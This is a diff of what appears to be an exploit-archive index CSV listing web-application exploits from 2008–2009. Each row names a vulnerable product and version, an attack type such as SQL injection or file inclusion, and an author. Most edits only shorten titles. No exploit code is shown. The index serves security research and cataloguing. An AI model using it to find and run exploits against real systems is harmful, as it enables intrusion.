+7379,platforms/php/webapps/7379.txt,"MG2 0.5.1 - 'filename' Remote Code Execution",2008-12-08,"Alfons Luja",php,webapps,0 +7380,platforms/php/webapps/7380.txt,"XOOPS 2.3.1 - Multiple Local File Inclusions",2008-12-08,DSecRG,php,webapps,0 7381,platforms/php/webapps/7381.txt,"siu guarani - Multiple Vulnerabilities",2008-12-08,"Ubik & proudhon",php,webapps,0 7382,platforms/php/webapps/7382.txt,"phpMyAdmin 3.1.0 - Cross-Site Request Forgery / SQL Injection",2008-12-08,"Michael Brooks",php,webapps,0 7383,platforms/php/webapps/7383.txt,"Simple Directory Listing 2 - Cross-Site Arbitrary File Upload",2008-12-08,"Michael Brooks",php,webapps,0 @@ -20962,7 +20963,7 @@ id,file,description,date,author,platform,type,port 7390,platforms/asp/webapps/7390.txt,"Professional Download Assistant 0.1 - Authentication Bypass",2008-12-09,ZoRLu,asp,webapps,0 7391,platforms/asp/webapps/7391.txt,"Poll Pro 2.0 - Authentication Bypass",2008-12-09,AlpHaNiX,asp,webapps,0 7392,platforms/php/webapps/7392.txt,"PHPmyGallery 1.0beta2 - Local/Remote File Inclusion",2008-12-09,ZoRLu,php,webapps,0 -7395,platforms/php/webapps/7395.txt,"Peel Shopping 3.1 - 'rubid' Parameter SQL Injection",2008-12-09,SuB-ZeRo,php,webapps,0 +7395,platforms/php/webapps/7395.txt,"Peel Shopping 3.1 - 'rubid' SQL Injection",2008-12-09,SuB-ZeRo,php,webapps,0 7396,platforms/php/webapps/7396.txt,"Netref 4.0 - Multiple SQL Injections",2008-12-09,SuB-ZeRo,php,webapps,0 7397,platforms/php/webapps/7397.txt,"ProQuiz 1.0 - Authentication Bypass",2008-12-09,Osirys,php,webapps,0 7398,platforms/asp/webapps/7398.txt,"postecards - SQL Injection / File Disclosure",2008-12-09,AlpHaNiX,asp,webapps,0 @@ -20973,13 +20974,13 @@ id,file,description,date,author,platform,type,port 7407,platforms/php/webapps/7407.txt,"WebMaster Marketplace - SQL Injection",2008-12-10,"Hussin X",php,webapps,0 7408,platforms/php/webapps/7408.txt,"living Local 1.1 - Cross-Site Scripting / Arbitrary File Upload",2008-12-10,Bgh7,php,webapps,0 7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 - Cross-Site Scripting / Cross-Site Request Forgery",2008-12-10,ZynbER,php,webapps,0 -7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - 'id' Parameter SQL Injection",2008-12-10,Osirys,php,webapps,0 +7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - 'id' SQL Injection",2008-12-10,Osirys,php,webapps,0 7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 - SQL Injection / File Disclosure",2008-12-10,AlpHaNiX,asp,webapps,0 7413,platforms/asp/webapps/7413.pl,"CF_Calendar - 'calendarevent.cfm' SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7414,platforms/asp/webapps/7414.txt,"CF_Auction - Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 -7415,platforms/asp/webapps/7415.txt,"CFMBLOG - 'categorynbr' Parameter Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 +7415,platforms/asp/webapps/7415.txt,"CFMBLOG - 'categorynbr' Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7416,platforms/asp/webapps/7416.txt,"CF_Forum - Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 -7417,platforms/php/webapps/7417.txt,"phpAddEdit 1.3 - 'editform' Parameter Local File Inclusion",2008-12-10,nuclear,php,webapps,0 +7417,platforms/php/webapps/7417.txt,"phpAddEdit 1.3 - 'editform' Local File Inclusion",2008-12-10,nuclear,php,webapps,0 7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 - 'cookie' Login Bypass",2008-12-11,x0r,php,webapps,0 7419,platforms/asp/webapps/7419.txt,"evCal Events Calendar - Database Disclosure",2008-12-11,Cyber-Zone,asp,webapps,0 7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar - Database Disclosure",2008-12-11,CoBRa_21,asp,webapps,0 @@ -20991,16 +20992,16 @@ id,file,description,date,author,platform,type,port 7426,platforms/php/webapps/7426.txt,"PHP Support Tickets 2.2 - Arbitrary File Upload",2008-12-11,ahmadbady,php,webapps,0 7427,platforms/asp/webapps/7427.txt,"The Net Guys ASPired2Poll - Remote Database Disclosure",2008-12-11,AlpHaNiX,asp,webapps,0 7428,platforms/asp/webapps/7428.txt,"The Net Guys ASPired2Protect - Database Disclosure",2008-12-12,AlpHaNiX,asp,webapps,0 -7429,platforms/asp/webapps/7429.txt,"ASP-CMS 1.0 - 'cha' Parameter SQL Injection",2008-12-12,"Khashayar Fereidani",asp,webapps,0 +7429,platforms/asp/webapps/7429.txt,"ASP-CMS 1.0 - 'cha' SQL Injection",2008-12-12,"Khashayar Fereidani",asp,webapps,0 7430,platforms/php/webapps/7430.txt,"SUMON 0.7.0 - Command Execution",2008-12-12,dun,php,webapps,0 -7432,platforms/php/webapps/7432.txt,"Xpoze 4.10 - 'menu' Parameter Blind SQL Injection",2008-12-12,XaDoS,php,webapps,0 -7433,platforms/php/webapps/7433.txt,"Social Groupie - 'id' Parameter SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 +7432,platforms/php/webapps/7432.txt,"Xpoze 4.10 - 'menu' Blind SQL Injection",2008-12-12,XaDoS,php,webapps,0 +7433,platforms/php/webapps/7433.txt,"Social Groupie - 'id' SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 7434,platforms/php/webapps/7434.sh,"Wysi Wiki Wyg 1.0 - Remote Password Retrieve Exploit",2008-12-12,StAkeR,php,webapps,0 7435,platforms/php/webapps/7435.txt,"Social Groupie - 'create_album.php' Arbitrary File Upload",2008-12-12,InjEctOr5,php,webapps,0 7436,platforms/asp/webapps/7436.txt,"the net guys aspired2blog - SQL Injection / File Disclosure",2008-12-12,Pouya_Server,asp,webapps,0 7437,platforms/php/webapps/7437.txt,"Moodle 1.9.3 - Remote Code Execution",2008-12-12,USH,php,webapps,0 7438,platforms/asp/webapps/7438.txt,"VP-ASP Shopping Cart 6.50 - Database Disclosure",2008-12-12,Dxil,asp,webapps,0 -7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' Parameter SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 +7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,asp,webapps,0 7441,platforms/php/webapps/7441.txt,"Joomla! Component live chat - SQL Injection / Open Proxy",2008-12-12,jdc,php,webapps,0 7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 / PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0 @@ -21016,7 +21017,7 @@ id,file,description,date,author,platform,type,port 7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 - 'download.php' Remote",2008-12-14,x0r,php,webapps,0 7456,platforms/php/webapps/7456.txt,"AvailScript Article Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps,0 7457,platforms/php/webapps/7457.txt,"AvailScript Classmate Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps,0 -7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 - 'lang' Parameter Local File Inclusion",2008-12-14,Osirys,php,webapps,0 +7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 - 'lang' Local File Inclusion",2008-12-14,Osirys,php,webapps,0 7459,platforms/php/webapps/7459.txt,"CFAGCMS 1 - Remote File Inclusion",2008-12-14,BeyazKurt,php,webapps,0 7461,platforms/php/webapps/7461.txt,"Flatnux - html/JavaScript Injection Cookie Grabber Exploit",2008-12-14,gmda,php,webapps,0 7462,platforms/asp/webapps/7462.txt,"ASPSiteWare Home Builder 1.0/2.0 - SQL Injection",2008-12-14,AlpHaNiX,asp,webapps,0 @@ -21055,7 +21056,7 @@ id,file,description,date,author,platform,type,port 7500,platforms/php/webapps/7500.txt,"K&S Shopsysteme - Arbitrary File Upload",2008-12-17,mNt,php,webapps,0 7502,platforms/php/webapps/7502.txt,"r.cms 2.0 - Multiple SQL Injections",2008-12-17,Lidloses_Auge,php,webapps,0 7504,platforms/php/webapps/7504.txt,"Joomla! Component Tech Article 1.x - SQL Injection",2008-12-17,InjEctOr5,php,webapps,0 -7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - 'menuID' Parameter SQL Injection",2008-12-17,AnGeL25dZ,php,webapps,0 +7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - 'menuID' SQL Injection",2008-12-17,AnGeL25dZ,php,webapps,0 7507,platforms/php/webapps/7507.pl,"Lizardware CMS 0.6.0 - Blind SQL Injection",2008-12-17,StAkeR,php,webapps,0 7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS - Database Disclosure",2008-12-17,AlpHaNiX,asp,webapps,0 7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary '.PHP' File Upload",2008-12-18,Pouya_Server,php,webapps,0 @@ -21065,13 +21066,13 @@ id,file,description,date,author,platform,type,port 7513,platforms/php/webapps/7513.txt,"Calendar Script 1.1 - Insecure Cookie Handling",2008-12-18,Osirys,php,webapps,0 7514,platforms/php/webapps/7514.txt,"I-Rater Basic - SQL Injection",2008-12-18,boom3rang,php,webapps,0 7515,platforms/php/webapps/7515.txt,"phpclanwebsite 1.23.3 fix pack #5 - Multiple Vulnerabilities",2008-12-18,s4avrd0w,php,webapps,0 -7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 - 'id' Parameter SQL Injection",2008-12-18,fuzion,php,webapps,0 +7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 - 'id' SQL Injection",2008-12-18,fuzion,php,webapps,0 7518,platforms/php/webapps/7518.txt,"Gobbl CMS 1.0 - Insecure Cookie Handling",2008-12-18,x0r,php,webapps,0 7519,platforms/php/webapps/7519.txt,"MyPHPsite - Local File Inclusion",2008-12-18,Piker,php,webapps,0 -7522,platforms/php/webapps/7522.pl,"MyPBS - 'seasonID' Parameter SQL Injection",2008-12-19,Piker,php,webapps,0 +7522,platforms/php/webapps/7522.pl,"MyPBS - 'seasonID' SQL Injection",2008-12-19,Piker,php,webapps,0 7523,platforms/php/webapps/7523.php,"ReVou Twitter Clone - Admin Password Change",2008-12-19,G4N0K,php,webapps,0 7524,platforms/php/webapps/7524.txt,"Online Keyword Research Tool - 'download.php' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 -7525,platforms/php/webapps/7525.txt,"Extract Website - 'Filename' Parameter File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 +7525,platforms/php/webapps/7525.txt,"Extract Website - 'Filename' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 7526,platforms/php/webapps/7526.txt,"myPHPscripts Login Session 2.0 - Cross-Site Scripting / Database Disclosure",2008-12-19,Osirys,php,webapps,0 7527,platforms/php/webapps/7527.txt,"FreeLyrics 1.0 - Remote File Disclosure",2008-12-19,Piker,php,webapps,0 7528,platforms/php/webapps/7528.pl,"OneOrZero helpdesk 1.6.x. - Arbitrary File Upload",2008-12-19,Ams,php,webapps,0 @@ -21085,7 +21086,7 @@ id,file,description,date,author,platform,type,port 7539,platforms/php/webapps/7539.txt,"Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0 7540,platforms/php/webapps/7540.txt,"phpg 1.6 - Cross-Site Scripting / Full Path Disclosure / Denial of Service",2008-12-21,"Anarchy Angel",php,webapps,0 7541,platforms/php/webapps/7541.pl,"RSS Simple News - SQL Injection",2008-12-22,Piker,php,webapps,0 -7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script - 'Filename' Parameter File Disclosure",2008-12-22,SirGod,php,webapps,0 +7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script - 'Filename' File Disclosure",2008-12-22,SirGod,php,webapps,0 7543,platforms/php/webapps/7543.txt,"WordPress Plugin Page Flip Image Gallery 0.2.2 - Remote File Disclosure",2008-12-22,GoLd_M,php,webapps,0 7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b - Arbitrary File Upload / SQL Injection",2008-12-22,Ams,php,webapps,0 7545,platforms/php/webapps/7545.txt,"yourplace 1.0.2 - Multiple Vulnerabilities / Remote Code Execution",2008-12-22,Osirys,php,webapps,0 @@ -21106,10 +21107,10 @@ id,file,description,date,author,platform,type,port 7567,platforms/php/webapps/7567.txt,"Joomla! Component com_lowcosthotels - Blind SQL Injection",2008-12-23,"Hussin X",php,webapps,0 7568,platforms/php/webapps/7568.txt,"Joomla! Component com_allhotels - Blind SQL Injection",2008-12-23,"Hussin X",php,webapps,0 7569,platforms/php/webapps/7569.txt,"doop CMS 1.4.0b - Cross-Site Request Forgery / Arbitrary File Upload",2008-12-24,x0r,php,webapps,0 -7570,platforms/php/webapps/7570.txt,"ILIAS 3.7.4 - 'ref_id' Parameter Blind SQL Injection",2008-12-24,Lidloses_Auge,php,webapps,0 +7570,platforms/php/webapps/7570.txt,"ILIAS 3.7.4 - 'ref_id' Blind SQL Injection",2008-12-24,Lidloses_Auge,php,webapps,0 7572,platforms/php/webapps/7572.txt,"Joomla! Component Ice Gallery 0.5b2 - 'catid' Blind SQL Injection",2008-12-24,boom3rang,php,webapps,0 7573,platforms/php/webapps/7573.txt,"Joomla! Component Live Ticker 1.0 - Blind SQL Injection",2008-12-24,boom3rang,php,webapps,0 -7574,platforms/php/webapps/7574.txt,"Joomla! Component mDigg 2.2.8 - 'category' Parameter SQL Injection",2008-12-24,boom3rang,php,webapps,0 +7574,platforms/php/webapps/7574.txt,"Joomla! Component mDigg 2.2.8 - 'category' SQL Injection",2008-12-24,boom3rang,php,webapps,0 7575,platforms/php/webapps/7575.pl,"Joomla! Component 5starhotels - SQL Injection",2008-12-24,EcHoLL,php,webapps,0 7576,platforms/php/webapps/7576.pl,"PHP-Fusion 7.0.2 - Blind SQL Injection",2008-12-24,StAkeR,php,webapps,0 7579,platforms/php/webapps/7579.txt,"ClaSS 0.8.60 - 'export.php' Local File Inclusion",2008-12-24,fuzion,php,webapps,0 @@ -21134,7 +21135,7 @@ id,file,description,date,author,platform,type,port 7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal - SQL Injection",2008-12-29,Osmanizim,asp,webapps,0 7611,platforms/php/webapps/7611.php,"CMS NetCat 3.0/3.12 - Blind SQL Injection",2008-12-29,s4avrd0w,php,webapps,0 7612,platforms/php/webapps/7612.txt,"Joomla! Component com_na_content 1.0 - Blind SQL Injection",2008-12-29,"Mehmet Ince",php,webapps,0 -7613,platforms/asp/webapps/7613.txt,"Sepcity Classified - 'ID' Parameter SQL Injection",2008-12-29,S.W.A.T.,asp,webapps,0 +7613,platforms/asp/webapps/7613.txt,"Sepcity Classified - 'ID' SQL Injection",2008-12-29,S.W.A.T.,asp,webapps,0 7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - Authentication Bypass",2008-12-29,x0r,php,webapps,0 7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 - Authentication Bypass",2008-12-29,x0r,php,webapps,0 7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - Authentication Bypass",2008-12-29,x0r,php,webapps,0 @@ -21155,16 +21156,16 @@ id,file,description,date,author,platform,type,port 7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Arbitrary File Upload",2009-01-01,Lo$er,php,webapps,0 7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - 'user.cfg' Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0 7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - Authentication Bypass",2009-01-01,DNX,php,webapps,0 -7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 - 'newsid' Parameter SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 +7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 - 'newsid' SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a - Authentication Bypass",2009-01-01,"Virangar Security",php,webapps,0 7644,platforms/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0 7645,platforms/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0 7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-01-02,ahmadbady,php,webapps,0 -7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection",2009-01-03,darkjoker,php,webapps,0 +7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection Vulnerabilities",2009-01-03,darkjoker,php,webapps,0 7653,platforms/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,php,webapps,0 -7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Parameter Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0 -7658,platforms/php/webapps/7658.pl,"PNPHPBB2 < 1.2i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0 -7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' Parameter SQL Injection",2009-01-04,DaiMon,php,webapps,0 +7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0 +7658,platforms/php/webapps/7658.pl,"PNPHPBB2 < 1.2i - 'ModName' Multiple Local File Inclusions",2009-01-04,StAkeR,php,webapps,0 +7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' SQL Injection",2009-01-04,DaiMon,php,webapps,0 7660,platforms/php/webapps/7660.txt,"PHPMesFilms 1.0 - 'index.php id' SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0 7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 - 'id' SQL Injection",2009-01-04,ZoRLu,php,webapps,0 7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 - Blind SQL Injection",2009-01-04,darkjoker,php,webapps,0 @@ -21173,11 +21174,11 @@ id,file,description,date,author,platform,type,port 7667,platforms/php/webapps/7667.txt,"Joomla! Component simple_review 1.x - SQL Injection",2009-01-05,EcHoLL,php,webapps,0 7668,platforms/php/webapps/7668.pl,"Cybershade CMS 0.2b - 'index.php' Remote File Inclusion",2009-01-05,JosS,php,webapps,0 7669,platforms/php/webapps/7669.pl,"Joomla! Component com_na_newsdescription - (newsid) SQL Injection",2009-01-05,EcHoLL,php,webapps,0 -7670,platforms/php/webapps/7670.pl,"Joomla! Component com_phocadocumentation - 'id' Parameter SQL Injection",2009-01-05,EcHoLL,php,webapps,0 +7670,platforms/php/webapps/7670.pl,"Joomla! Component com_phocadocumentation - 'id' SQL Injection",2009-01-05,EcHoLL,php,webapps,0 7672,platforms/php/webapps/7672.txt,"PHPAuctionSystem - Cross-Site Scripting / SQL Injection",2009-01-05,x0r,php,webapps,0 7674,platforms/php/webapps/7674.txt,"PHPAuctionSystem - Insecure Cookie Handling",2009-01-05,ZoRLu,php,webapps,0 -7678,platforms/php/webapps/7678.txt,"PHPAuctionSystem - Multiple Remote File Inclusion",2009-01-06,darkmasking,php,webapps,0 -7679,platforms/php/webapps/7679.php,"RiotPix 0.61 - 'forumid' Parameter Blind SQL Injection",2009-01-06,cOndemned,php,webapps,0 +7678,platforms/php/webapps/7678.txt,"PHPAuctionSystem - Multiple Remote File Inclusions",2009-01-06,darkmasking,php,webapps,0 +7679,platforms/php/webapps/7679.php,"RiotPix 0.61 - 'forumid' Blind SQL Injection",2009-01-06,cOndemned,php,webapps,0 7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 - Cross-Site Scripting / SQL Injection",2009-01-06,!-BUGJACK-!,php,webapps,0 7682,platforms/php/webapps/7682.txt,"RiotPix 0.61 - Authentication Bypass",2009-01-06,ZoRLu,php,webapps,0 7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - 'FrontPage.php' Blind SQL Injection",2009-01-06,darkjoker,php,webapps,0 @@ -21190,7 +21191,7 @@ id,file,description,date,author,platform,type,port 7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - 'items.php' SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0 7699,platforms/php/webapps/7699.txt,"QuoteBook - Remote Config File Disclosure",2009-01-07,Moudi,php,webapps,0 7700,platforms/php/webapps/7700.php,"CuteNews 1.4.6 - 'ip ban' Authorized Cross-Site Scripting / Command Execution",2009-01-08,StAkeR,php,webapps,0 -7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - 'comment_id' Parameter SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0 +7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - 'comment_id' SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0 7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0 7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - 'mydirname' PHP Remote Code Execution",2009-01-08,StAkeR,php,webapps,0 7711,platforms/php/webapps/7711.txt,"Fast FAQs System - Authentication Bypass",2009-01-09,x0r,php,webapps,0 @@ -21200,7 +21201,7 @@ id,file,description,date,author,platform,type,port 7719,platforms/php/webapps/7719.txt,"Fast Guest Book - Authentication Bypass",2009-01-11,Moudi,php,webapps,0 7722,platforms/php/webapps/7722.txt,"DZcms 3.1 - SQL Injection",2009-01-11,"Glafkos Charalambous",php,webapps,0 7723,platforms/php/webapps/7723.txt,"Seo4SMF for SMF forums - Multiple Vulnerabilities",2009-01-11,WHK,php,webapps,0 -7724,platforms/php/webapps/7724.php,"phpMDJ 1.0.3 - 'id_animateur' Parameter Blind SQL Injection",2009-01-11,darkjoker,php,webapps,0 +7724,platforms/php/webapps/7724.php,"phpMDJ 1.0.3 - 'id_animateur' Blind SQL Injection",2009-01-11,darkjoker,php,webapps,0 7725,platforms/php/webapps/7725.txt,"XOOPS Module tadbook2 - SQL Injection",2009-01-11,stylextra,php,webapps,0 7726,platforms/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - Authentication Bypass",2009-01-11,SirGod,php,webapps,0 7728,platforms/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - Authentication Bypass",2009-01-11,x0r,php,webapps,0 @@ -21208,8 +21209,8 @@ id,file,description,date,author,platform,type,port 7730,platforms/php/webapps/7730.txt,"Social Engine - SQL Injection",2009-01-11,snakespc,php,webapps,0 7731,platforms/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0 7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion",2009-01-11,"Danny Moules",php,webapps,0 -7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Parameter Local File Inclusion",2009-01-11,Osirys,php,webapps,0 -7734,platforms/php/webapps/7734.txt,"Joomla! Component Portfol 1.2 - 'vcatid' Parameter SQL Injection",2009-01-12,H!tm@N,php,webapps,0 +7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Local File Inclusion",2009-01-11,Osirys,php,webapps,0 +7734,platforms/php/webapps/7734.txt,"Joomla! Component Portfol 1.2 - 'vcatid' SQL Injection",2009-01-12,H!tm@N,php,webapps,0 7735,platforms/php/webapps/7735.pl,"Simple Machines Forum (SMF) 1.0.13/1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass",2009-01-12,Xianur0,php,webapps,0 7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0 7738,platforms/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,php,webapps,0 @@ -21241,7 +21242,7 @@ id,file,description,date,author,platform,type,port 7782,platforms/asp/webapps/7782.txt,"DMXReady PayPal Store Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0 7783,platforms/asp/webapps/7783.txt,"DMXReady Photo Gallery Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0 7784,platforms/asp/webapps/7784.txt,"DMXReady Registration Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0 -7786,platforms/php/webapps/7786.txt,"PHP Photo Album 0.8b - 'preview' Parameter Local File Inclusion",2009-01-14,Osirys,php,webapps,0 +7786,platforms/php/webapps/7786.txt,"PHP Photo Album 0.8b - 'preview' Local File Inclusion",2009-01-14,Osirys,php,webapps,0 7787,platforms/php/webapps/7787.txt,"DMXReady Secure Document Library 1.1 - SQL Injection",2009-01-14,ajann,php,webapps,0 7788,platforms/asp/webapps/7788.txt,"DMXReady BillboardManager 1.1 - Contents Change",2009-01-14,x0r,asp,webapps,0 7789,platforms/asp/webapps/7789.txt,"DMXReady SDK 1.1 - Arbitrary File Download",2009-01-14,ajann,asp,webapps,0 @@ -21250,7 +21251,7 @@ id,file,description,date,author,platform,type,port 7793,platforms/php/webapps/7793.php,"Joomla! Component com_Eventing 1.6.x - Blind SQL Injection",2009-01-15,InjEctOr5,php,webapps,0 7795,platforms/php/webapps/7795.txt,"Joomla! Component RD-Autos 1.5.5 - SQL Injection",2009-01-15,H!tm@N,php,webapps,0 7796,platforms/php/webapps/7796.txt,"MKPortal 1.2.1 - Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps,0 -7797,platforms/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Parameter Blind SQL Injection",2009-01-15,darkjoker,php,webapps,0 +7797,platforms/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Blind SQL Injection",2009-01-15,darkjoker,php,webapps,0 7798,platforms/php/webapps/7798.txt,"Free Bible Search PHP Script - SQL Injection",2009-01-15,nuclear,php,webapps,0 7800,platforms/asp/webapps/7800.txt,"eFAQ - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0 7801,platforms/asp/webapps/7801.txt,"eReservations - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0 @@ -21264,28 +21265,28 @@ id,file,description,date,author,platform,type,port 7811,platforms/php/webapps/7811.txt,"Aj Classifieds For Sale 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0 7813,platforms/php/webapps/7813.txt,"Simple PHP NewsLetter 1.5 - Local File Inclusion",2009-01-16,ahmadbady,php,webapps,0 7814,platforms/php/webapps/7814.txt,"BibCiter 1.4 - Multiple SQL Injections",2009-01-16,nuclear,php,webapps,0 -7815,platforms/php/webapps/7815.txt,"Joomla! Component Gigcal 1.x - 'id' Parameter SQL Injection",2009-01-18,Lanti-Net,php,webapps,0 +7815,platforms/php/webapps/7815.txt,"Joomla! Component Gigcal 1.x - 'id' SQL Injection",2009-01-18,Lanti-Net,php,webapps,0 7816,platforms/asp/webapps/7816.txt,"DS-IPN.NET Digital Sales IPN - Database Disclosure",2009-01-18,Moudi,asp,webapps,0 7817,platforms/php/webapps/7817.txt,"Click&Email - Authentication Bypass",2009-01-18,SuB-ZeRo,php,webapps,0 7818,platforms/php/webapps/7818.txt,"SCMS 1 - Local File Inclusion",2009-01-18,ahmadbady,php,webapps,0 7819,platforms/php/webapps/7819.txt,"ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure",2009-01-18,bd0rk,php,webapps,0 7820,platforms/php/webapps/7820.pl,"Fhimage 1.2.1 - Remote Index Change Exploit",2009-01-19,Osirys,php,webapps,0 7821,platforms/php/webapps/7821.pl,"Fhimage 1.2.1 - Remote Command Execution (mq = off)",2009-01-19,Osirys,php,webapps,0 -7824,platforms/php/webapps/7824.pl,"Joomla! Component com_pccookbook - 'recipe_id' Parameter Blind SQL Injection",2009-01-19,InjEctOr5,php,webapps,0 +7824,platforms/php/webapps/7824.pl,"Joomla! Component com_pccookbook - 'recipe_id' Blind SQL Injection",2009-01-19,InjEctOr5,php,webapps,0 7828,platforms/php/webapps/7828.txt,"Joomla! Component com_news - SQL Injection",2009-01-19,snakespc,php,webapps,0 -7829,platforms/php/webapps/7829.txt,"Gallery Kys 1.0 - Admin Password Disclosure / Permanent Cross-Site Scripting",2009-01-19,Osirys,php,webapps,0 +7829,platforms/php/webapps/7829.txt,"Gallery Kys 1.0 - Admin Password Disclosure / Persistent Cross-Site Scripting",2009-01-19,Osirys,php,webapps,0 7830,platforms/php/webapps/7830.txt,"RCBlog 1.03 - Authentication Bypass",2009-01-19,"Danny Moules",php,webapps,0 7831,platforms/php/webapps/7831.txt,"Ninja Blog 4.8 - Remote Information Disclosure",2009-01-19,"Danny Moules",php,webapps,0 7832,platforms/php/webapps/7832.txt,"phpads 2.0 - Multiple Vulnerabilities",2009-01-19,"Danny Moules",php,webapps,0 7833,platforms/php/webapps/7833.php,"Joomla! Component com_waticketsystem - Blind SQL Injection",2009-01-19,InjEctOr5,php,webapps,0 7834,platforms/php/webapps/7834.txt,"Ninja Blog 4.8 - Cross-Site Request Forgery/HTML Injection",2009-01-19,"Danny Moules",php,webapps,0 7835,platforms/php/webapps/7835.htm,"Max.Blog 1.0.6 - Arbitrary Delete Post Exploit",2009-01-20,SirGod,php,webapps,0 